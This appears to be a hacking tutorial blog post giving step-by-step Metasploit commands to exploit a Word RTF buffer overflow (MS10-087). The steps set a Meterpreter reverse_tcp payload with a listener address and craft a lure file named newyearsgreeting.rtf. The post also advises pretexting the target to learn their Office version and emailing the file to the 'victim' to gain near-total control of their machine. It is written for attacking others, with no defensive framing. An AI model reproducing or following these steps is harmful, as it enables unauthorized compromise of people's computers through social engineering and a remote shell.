As web server and OS’s have become hardened and living behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold. This is through the often unpatched, unhardened client-side system with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products.
This hack will work on the Word 2007 or Word 2010. If you know who your target is, you can easily pretext their Office Version by stating you want to make sure they have compatibility with the file you are about to send them. We will exploit a buffer overflow in Word to allow us to plant a listener on our target system. I’m assuming that you have the victim’s IP address and have verified the Microsoft Office is running (a good assumption, but its better to verify).
Step 1: Start Metasploit
So, let’s fire up Metasploit and find the exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Now, set Metasploit to use this exploit by typing:
msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Step 2: Set a Payload
Then we need to set a payload. In this case, we wish to use Metasploit’s powerful Meterpreter to establish a listener on the victim’s system.
msf exploit( ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
Step 3: Show Options
Now, let’s look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let’s take a look at the options for this exploit by typing
msf >show options
Step 4: Change FILENAME
We can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file and Metasploit gives it a default name of FILENAME. Let’s change that name to something more inviting to our victim, such as newyearsgreeting.rtf
msf >set FILENAME newyearsgreeting.rtf
Step 5: Set Your Local Host
Next we need to set the LHOST or the local host. This will be the system we will be listening from–usually our local system–but it could be any system you want to listen from. We simply need to set the LHOST with the IP address of our listening system, in this case 192.168.1.100.
msf> set LHOST 192.168.1.100
Step 6: Last Check of Options
Before we exploit the victim’s system, let’s check to make sure all our options are set properly.
msf> show options
Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the LHOST is 192.168.1.100.
Step 7: Exploit
Now, we are ready to exploit. Simply type:
msf > exploit
You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at /root/.msf4/local/newyearsgreeting.rtf.
Step 8: Send the File to the Victim
Now we need to send this file to the victim through email or another method. Once the victim opens the file, the Word application will hang or crash leaving us with an active session of Meterpeter on the victim’s system. With an active Meterpreter session on the victim’s system, we have nearly total control or “own” their system.